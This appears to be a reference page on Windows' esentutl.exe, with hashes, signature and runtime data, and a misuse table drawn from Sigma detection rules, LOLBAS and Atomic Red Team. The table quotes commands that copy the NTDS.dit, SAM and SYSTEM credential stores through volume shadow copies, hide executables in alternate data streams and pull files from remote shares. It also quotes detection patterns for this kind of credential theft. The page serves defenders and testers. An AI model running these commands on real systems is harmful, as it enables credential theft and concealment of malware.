esentutl.exe

  • File Path: C:\Windows\SysWOW64\esentutl.exe
  • Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

| Type | Hash |
|---|---|
| MD5 | 5F5105050FBE68E930486635C5557F84 |
| SHA1 | 2D07C804E9EFE16DDA41619D9E5F5448E524BBED |
| SHA256 | 26D0A05D6AC8584440B3B771CF8BE4746E5F2BF19FFB118FD7C7DD551F61BA74 |
| SHA384 | 2DCAEEF6FCFB20B584FBA8E88B5C938A6B1529C8ED07ADDCAC10E86488CD3FFE7F4C84AD636DD76FD1A25F4423CDB041 |
| SHA512 | 80F9CFC5BB514871325B947AA534D4F868B141868E6BFCA9E5255EC758E88371FE4F7FA3CC3899019B79FBD6CA13E61CE7757179BC3FAA34F440AA155DA65CF8 |
| SSDEEP | 6144:fzAG0u8JLzbva/bv7caTZmxvnJwYKlK4KhOxZTfjr4fn:sG0LJLzbvazNToxKZcGZTjrGn |
| IMP | F1C6F14D0CE10C71EBBD7A7E5EDDA3EF |
| PESHA1 | E9142BDE071AE792A26AE52A41B2B0542F445810 |
| PE256 | 2FDEEE9EE5D98439E247E0F09F75874B5C108DC214A9C2FAC9DEFD3496BB61A0 |

Runtime Data

Child Processes:

conhost.exe

Open Handles:

| Path | Type |
|---|---|
| (RW-) C:\Users\user | File |
| (RW-) C:\Windows | File |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 | Section |
| \BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
| \BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\esentutl.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: esentutl.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/75
  • VirusTotal Link: https://www.virustotal.com/gui/file/26d0a05d6ac8584440b3b771cf8be4746e5f2bf19ffb118fd7c7dd551f61ba74/detection

Possible Misuse

The following table lists possible examples of esentutl.exe being misused, drawn from public detection rules and test suites. esentutl.exe is not inherently malicious, but its legitimate functionality (copying files, including locked ones, via /y and /vss) can be abused for malicious purposes.

| Source | Source File | Example | License |
|---|---|---|---|
| sigma | sysmon_suspicious_remote_thread.yml | - '\esentutl.exe' | DRL 1.0 |
| sigma | win_susp_esentutl_activity.yml | title: Suspicious Esentutl Use | DRL 1.0 |
| sigma | win_susp_esentutl_activity.yml | description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. | DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ | DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - esentutl.exe /y /vss *\ntds.dit* | DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - esentutl.exe /y /vss *\SAM | DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - esentutl.exe /y /vss *\SYSTEM | DRL 1.0 |
| sigma | proc_creation_win_alternate_data_streams.yml | - 'esentutl ' | DRL 1.0 |
| sigma | proc_creation_win_copying_sensitive_files_with_credential_data.yml | - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ | DRL 1.0 |
| sigma | proc_creation_win_copying_sensitive_files_with_credential_data.yml | - Image\|endswith: '\esentutl.exe' | DRL 1.0 |
| sigma | proc_creation_win_esentutl_webcache.yml | title: Esentutl Steals Browser Information | DRL 1.0 |
| sigma | proc_creation_win_esentutl_webcache.yml | description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe | DRL 1.0 |
| sigma | proc_creation_win_esentutl_webcache.yml | Image\|endswith: \esentutl.exe | DRL 1.0 |
| sigma | proc_creation_win_susp_esentutl_params.yml | title: Esentutl Gather Credentials | DRL 1.0 |
| sigma | proc_creation_win_susp_esentutl_params.yml | description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utility to get MSEdge info via its module pwgrab. | DRL 1.0 |
| sigma | proc_creation_win_susp_esentutl_params.yml | - 'esentutl' | DRL 1.0 |
| sigma | registry_event_esentutl_volume_shadow_copy_service_keys.yml | title: Esentutl Volume Shadow Copy Service Keys | DRL 1.0 |
| sigma | registry_event_esentutl_volume_shadow_copy_service_keys.yml | description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. | DRL 1.0 |
| sigma | registry_event_esentutl_volume_shadow_copy_service_keys.yml | Image\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter | DRL 1.0 |
| LOLBAS | Esentutl.yml | Name: Esentutl.exe | |
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o | |
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o | |
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o | |
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | |
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o | |
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit | |
| LOLBAS | Esentutl.yml | - Path: C:\Windows\System32\esentutl.exe | |
| LOLBAS | Esentutl.yml | - Path: C:\Windows\SysWOW64\esentutl.exe | |
| LOLBAS | Esentutl.yml | - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ | |
| atomic-red-team | index.md | - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: esentutl.exe SAM copy [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: esentutl.exe SAM copy [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | - Atomic Test #3 - esentutl.exe SAM copy | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | ## Atomic Test #3 - esentutl.exe SAM copy | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | Copy the SAM hive using the esentutl.exe utility | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o | MIT License. © 2018 Red Canary |

MIT License. Copyright (c) 2020-2021 Strontic.